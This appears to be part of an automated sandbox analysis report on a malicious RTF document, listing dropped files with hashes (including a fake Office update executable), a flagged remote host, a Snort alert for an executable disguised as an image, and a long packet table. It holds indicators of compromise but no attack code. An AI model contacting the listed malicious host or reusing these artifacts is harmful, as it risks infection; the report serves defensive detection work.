SHA-512:	9A029DF52BAE31B8E69BADECA6AD4A8DA19D12557EDFCC2A85DD0C85EBEA9090E79CAD09DC4DCF9D905D73628FA41FDD7D0A2577D4B4A716DA0A6EEA02ADF3D0
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Mal.LNK
File Type:	MS Windows shortcut
MD5:	ADED929454FFE8CF2DA08B9976BCE112
SHA1:	C7F927968D43BFCAB7048D2C82269EC9373FAB79
SHA-256:	CD8E2AA798E9A34CECC344237D281A2B76BA6FF7D50020A57BD7A7FCC3964991
SHA-512:	6EFC1070E36F327F277156C14E501AE9C45D9CF68AF076BC9AA696B410B68C42599BC67400833563659A78C059E53C2B401455D30063607225D2F02746C188E6
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
File Type:	ASCII text, with CRLF line terminators
MD5:	44CAAF9F6E6FF7FD97EB3807519FEFFF
SHA1:	CEE95AA000F75B858FBE81157EDA4E3790DE5279
SHA-256:	422B11904025811852AF69BFB38792E446667C65A71009C6935A847017E9C16E
SHA-512:	9226DCE78B0433B9C0540C8779D3D9C1077B91DA4F9124BA437182AB5D860A6C8641A51195B04C0671B0B04FBAC04883493F9D0BD85E56576D334C20C57C6978
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
File Type:	data
MD5:	51B737EEB457E0D828DF17BD63B4CC3C
SHA1:	663B59FD9D862CDD7467883FC790380AE6C84687
SHA-256:	73DBEBEE25C16870FC29CCCAC98ADF84E6287F08489FB14DC18B17B5FDA3A858
SHA-512:	E5136386EA789B1A8253C3D9B4C8E32558FF0C99641D44926F0356C56677F304F71EB6DA473511CF73108F04E58DDC08D24A87838082463E853E2338F57BA8D4
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\9ATBZDVJ.txt
File Type:	ASCII text
MD5:	C62E4368CAB13DAE7BB4D0D49A4A92B4
SHA1:	A3717C76A0DEB725BD0A050B41F329D048D24C0E
SHA-256:	89247E172C475E44D97D51A2D6B499ECA338BAB0851446177F6C6C73A96465D4
SHA-512:	BDC4BEC8D0E9C64153A14A22E5DA271B98257BFD8C08A99EED181A478C654347CFFCC6C00D99B0C2EC0B99D55909B491F765C2AA81CF28F188F0F4C87EE2B9AB
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5:	A7B990D5F57B244DD17E9A937A41E7F5
SHA1:	C217D48C4AC1555491348721CC7CFD1143FE0B16
SHA-256:	B035CA2D174E5E4FD2D66FD3C8CE4AE5C1E75CF3290AF872D1ADB2658852AFB8
SHA-512:	05C39D5C3F823C7E8F8080BD9FB712660C4D8B2F41127A1E906EA82AA29747F1608949F71F7EB6BB07B11A8BCFCB89E7B4D0F94E8456E51AAB38BB84AC7D883B
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\807TJP1XLJLYJZEPFXWQ.temp
File Type:	data
MD5:	F5DF1ADE77F0D350100FE11E74726B62
SHA1:	722234B8CD92CD32962E12BC15233F32FF10476E
SHA-256:	5798EDCACA4F5F9C387ECAC389B21A5D9EBC11594791F6789C81E42F08C4AE5E
SHA-512:	6FB24D58B86F4257EEA8649A672FE6A6A3E3AA9146C2C9FB40DE47E70F0EB47DCF879E969082B11A422661DA5F204B0FE5DA8F5EF2BD166552EE079080DDD6AE
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NFP157UNQBURTR2QNQ2E.temp
File Type:	data
MD5:	F5DF1ADE77F0D350100FE11E74726B62
SHA1:	722234B8CD92CD32962E12BC15233F32FF10476E
SHA-256:	5798EDCACA4F5F9C387ECAC389B21A5D9EBC11594791F6789C81E42F08C4AE5E
SHA-512:	6FB24D58B86F4257EEA8649A672FE6A6A3E3AA9146C2C9FB40DE47E70F0EB47DCF879E969082B11A422661DA5F204B0FE5DA8F5EF2BD166552EE079080DDD6AE
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P8KXFP1Y9SRGQRDN7DAF.temp
File Type:	data
MD5:	F5DF1ADE77F0D350100FE11E74726B62
SHA1:	722234B8CD92CD32962E12BC15233F32FF10476E
SHA-256:	5798EDCACA4F5F9C387ECAC389B21A5D9EBC11594791F6789C81E42F08C4AE5E
SHA-512:	6FB24D58B86F4257EEA8649A672FE6A6A3E3AA9146C2C9FB40DE47E70F0EB47DCF879E969082B11A422661DA5F204B0FE5DA8F5EF2BD166552EE079080DDD6AE
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QSKU0QFS499BEH6ZIAEM.temp
File Type:	data
MD5:	F5DF1ADE77F0D350100FE11E74726B62
SHA1:	722234B8CD92CD32962E12BC15233F32FF10476E
SHA-256:	5798EDCACA4F5F9C387ECAC389B21A5D9EBC11594791F6789C81E42F08C4AE5E
SHA-512:	6FB24D58B86F4257EEA8649A672FE6A6A3E3AA9146C2C9FB40DE47E70F0EB47DCF879E969082B11A422661DA5F204B0FE5DA8F5EF2BD166552EE079080DDD6AE
Malicious:	false

C:\Users\user\Desktop\~$Mal.doc
File Type:	data
MD5:	51B737EEB457E0D828DF17BD63B4CC3C
SHA1:	663B59FD9D862CDD7467883FC790380AE6C84687
SHA-256:	73DBEBEE25C16870FC29CCCAC98ADF84E6287F08489FB14DC18B17B5FDA3A858
SHA-512:	E5136386EA789B1A8253C3D9B4C8E32558FF0C99641D44926F0356C56677F304F71EB6DA473511CF73108F04E58DDC08D24A87838082463E853E2338F57BA8D4
Malicious:	true

C:\Windows\System32\com\SOAPAssembly\CSCD1D2.tmp
File Type:	MSVC .res
MD5:	3947D74568301010203D7A17B191E623
SHA1:	EBE423F9CED67B4DE864C565B221C55402DDF7C1
SHA-256:	9F4D19C76C1966A9A06ED238E68BAFE88CEFF220230AB4A0314D4C83677EB935
SHA-512:	B695A9C44C8AEA95F5EF4C913901B55DC98A9F884A46599532F752DAD9473268BE95C4748BB23761011F7EFD109478EE69F26FCA4E0D4AFC817021BFB3B0FF5F
Malicious:	false

C:\Windows\System32\com\SOAPAssembly\Logo.cs
File Type:	ASCII C++ program text, with CRLF, LF line terminators
MD5:	72060E85D44106561F2F52AC80433A89
SHA1:	AAEC0E9F97741E1F92D75838E300911157E7A2CF
SHA-256:	CE83BA3E60F8CCDB51E3021650D3B26F4BFAE6DCE3F4E509787B6647EA819C16
SHA-512:	CF25018955E2B75E963D31DED3FE92F9FFE9D2423FDD7581D5B5F17BD7C8FD6E071F9760D81306F0CE23A502559D13CC46DF7D83CC06854FA3460C11CAFA399D
Malicious:	false

C:\Windows\System32\com\SOAPAssembly\http100914219423642070img0office4png.dll
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit Mono/.Net assembly
MD5:	594E5D6E0FE1B933ECD44973E113FC5B
SHA1:	3C9476E772FF50A0A3CA40C844CFF349F3B11F01
SHA-256:	F2406C8D33AF82E0A12998EFC2B1C1827009EEA052C56B414C292839361F936A
SHA-512:	522065EBD9A64B6A1D62FA30474CCC3A0C96B3F07563D0E982D7F89B966E526CE6890175CC9C9FD6154F337C5E0F2E008EB6F06B375599BC3ADF1A9574078FA4
Malicious:	true

C:\Windows\System32\com\SOAPAssembly\http100914219423642070img0office4png.pdb
File Type:	data
MD5:	765C750BFBB9AE5AA4A1E304698AE77C
SHA1:	E2A89F57BA5367BC19C0046A0A36E41E73D5FA83
SHA-256:	0101262564EBA6C5C66938D2C3E229F7818C438CBC63BA79676500A950F2D84E
SHA-512:	26300FDFF9D7D22AD7C7D1257A0BF9141D49CBF3F1DDCBDCF691B5B5595B5F212C5322FE89657DB8753CB5BB265DC3DE00DF8FB010236FF5BD50BAB0BA634B4A
Malicious:	true

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection
clienttemplates.content.office.net	88.221.14.177	true	true

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	ASN	ASN Name	Malicious
8.8.8.8	United States	15169	GoogleInc	false
192.168.1.16	unknown	unknown	unknown	false
91.219.236.207	Hungary	56322	Azar-AKft	true
88.221.14.177	European Union	20940	AkamaiInternationalBV	true

Static File Info

General
File type:	Rich Text Format data, version 1, unknown character set
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	Mal.doc
File size:	52911
MD5:	fe5c4d6bb78e170abf5cf3741868ea4c
SHA1:	2377f3aa486ac9a1ecf28771d5b0e9848ec08654
SHA256:	0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684
SHA512:	4825c14f1c37a5987fc1785fc1ba9b6033ccf5d0e79be0d6f29f04263e9c3c560e88ffed4a0ce80502bda5b06c1512bd3c8b69c50d1a776f9b6205ec4e669f24
File Content Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\

File Icon

Network Behavior

Download Network PCAP:	Network PCAP

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/12/17-22:18:47.092718	TCP	2020757	ET MALWARE Windows executable sent when remote host claims to send an image 2	80	49199	91.219.236.207	192.168.1.16

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 12, 2017 22:17:48.035402060 MESZ	49193	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:17:48.035442114 MESZ	80	49193	91.219.236.207	192.168.1.16
Sep 12, 2017 22:17:48.035547018 MESZ	49193	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:17:48.055948973 MESZ	49193	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:17:48.055986881 MESZ	80	49193	91.219.236.207	192.168.1.16
Sep 12, 2017 22:17:48.579154968 MESZ	80	49193	91.219.236.207	192.168.1.16
Sep 12, 2017 22:17:48.780488968 MESZ	80	49193	91.219.236.207	192.168.1.16
Sep 12, 2017 22:17:48.780709982 MESZ	49193	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:17:53.079219103 MESZ	49194	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:17:53.079271078 MESZ	80	49194	91.219.236.207	192.168.1.16
Sep 12, 2017 22:17:53.080281019 MESZ	49194	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:17:53.082751989 MESZ	49194	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:17:53.082778931 MESZ	80	49194	91.219.236.207	192.168.1.16
Sep 12, 2017 22:17:53.673217058 MESZ	80	49193	91.219.236.207	192.168.1.16
Sep 12, 2017 22:17:53.673261881 MESZ	80	49194	91.219.236.207	192.168.1.16
Sep 12, 2017 22:17:53.673274040 MESZ	80	49194	91.219.236.207	192.168.1.16
Sep 12, 2017 22:17:53.673281908 MESZ	80	49194	91.219.236.207	192.168.1.16
Sep 12, 2017 22:17:53.673409939 MESZ	49193	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:17:53.673461914 MESZ	49194	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:17:53.712901115 MESZ	80	49194	91.219.236.207	192.168.1.16
Sep 12, 2017 22:17:53.713598967 MESZ	49194	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:17:58.318655968 MESZ	80	49194	91.219.236.207	192.168.1.16
Sep 12, 2017 22:17:58.318718910 MESZ	49194	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:08.019457102 MESZ	49193	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:26.005532980 MESZ	61484	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:26.427146912 MESZ	53	61484	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:27.554347038 MESZ	54797	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:27.864702940 MESZ	53	54797	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:30.424084902 MESZ	58435	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:30.985002041 MESZ	53	58435	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:31.082403898 MESZ	51184	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:31.512681007 MESZ	53	51184	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:32.703862906 MESZ	51632	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:33.142751932 MESZ	53	51632	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:33.232844114 MESZ	57086	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:33.579993010 MESZ	53	57086	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:36.398427963 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:36.398526907 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:36.398691893 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:36.423420906 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:36.423487902 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:42.780735016 MESZ	58475	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:43.067595005 MESZ	53	58475	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:43.075220108 MESZ	63992	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:43.308604956 MESZ	53	63992	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:47.092717886 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.092752934 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.092766047 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.092983961 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.124105930 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.124142885 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.124155998 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.124361038 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.126447916 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.126486063 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.126496077 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.126636982 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.136589050 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.136639118 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.136657953 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.136780024 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.158987999 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.159187078 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.159198999 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.160164118 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.160207033 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.166663885 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.166692019 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.166939020 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.166999102 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.177254915 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.177275896 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.177527905 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.177599907 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.200838089 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.200875044 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.200959921 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.201107025 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.201143026 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.207222939 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.207240105 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.207650900 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.207686901 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.215380907 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.215398073 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.216089964 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.216130972 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.237606049 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.237657070 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.237796068 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.237823009 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.238207102 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.238230944 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.238275051 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.238610029 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.238627911 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.335865974 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.335911036 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.336174965 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.336216927 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.365919113 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.365950108 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.366219997 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.366293907 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.377604008 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.377660036 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.377986908 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.378061056 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.378540993 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.378575087 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.379333019 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.379379988 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.410912037 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.410948038 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.411264896 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.411344051 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.411506891 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.411552906 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.411726952 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.411746025 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.411757946 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.411809921 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.411853075 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.411871910 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.411896944 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.412587881 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.412625074 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.414321899 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.471900940 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.554238081 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.554279089 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.554527044 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.554590940 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.555994034 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.556025028 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.556154013 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.556180000 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.567131042 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.567162991 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.567301989 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.567339897 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.568811893 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.568837881 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.568845987 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.568970919 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.568998098 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.593383074 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.593422890 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.596550941 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.596592903 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.601434946 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.601469040 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.601604939 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.601636887 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.608871937 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.608903885 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.609016895 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.609066963 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.629633904 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.629657984 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.629705906 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.629793882 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.629825115 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.630820036 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.638772011 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.639930010 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.639957905 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.639971972 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.640094995 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.642246962 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.647891998 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.647897959 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.647912979 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.648005962 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.648663998 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.662317991 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.662362099 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.662487030 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.662512064 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.680183887 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.680232048 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.680481911 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.680514097 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.685625076 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.685664892 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.686108112 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.686150074 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.687164068 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.687192917 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.687306881 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.687321901 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.687882900 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.687897921 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.688318014 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.688332081 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.727081060 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.727101088 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.727111101 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.727197886 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.727221012 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.779743910 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.779829025 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.780266047 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.780287027 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.801928997 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.801939964 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.802057981 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.802092075 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.802251101 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.802297115 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.802627087 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.802663088 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.815428019 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.815459013 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.815587044 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.815623045 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.854207039 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.854226112 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.854744911 MESZ	49199	80	192.168.1.16	91.219.236.207
